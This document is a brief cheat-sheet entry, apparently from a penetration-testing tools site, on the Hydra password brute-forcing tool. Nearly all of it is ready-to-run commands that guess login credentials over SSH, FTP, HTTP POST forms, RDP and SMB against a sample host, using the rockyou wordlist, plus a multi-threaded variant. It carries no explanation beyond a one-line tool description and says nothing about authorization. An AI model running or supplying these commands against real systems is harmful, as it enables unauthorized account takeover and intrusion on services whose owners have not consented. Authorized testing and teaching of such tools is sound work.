Tools & Utility

Hydra

Fast and flexible online password brute-forcing tool supporting numerous protocols.

#bruteforce#password#hydra#login

Hydra: Online Password Brute-Forcing

Hydra is a fast and flexible online password brute-forcing tool that supports numerous protocols including SSH, FTP, HTTP, SMB, RDP, and more.

Usage

bash
# SSH Brute-Force
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1

FTP Brute-Force

hydra -l admin -P wordlist.txt ftp://192.168.1.1

HTTP POST Form

hydra -l admin -P wordlist.txt 192.168.1.1 http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"

RDP Brute-Force

hydra -l admin -P wordlist.txt rdp://192.168.1.1

SMB

hydra -l admin -P wordlist.txt smb://192.168.1.1

Multi-threaded

hydra -t 16 -l admin -P wordlist.txt ssh://192.168.1.1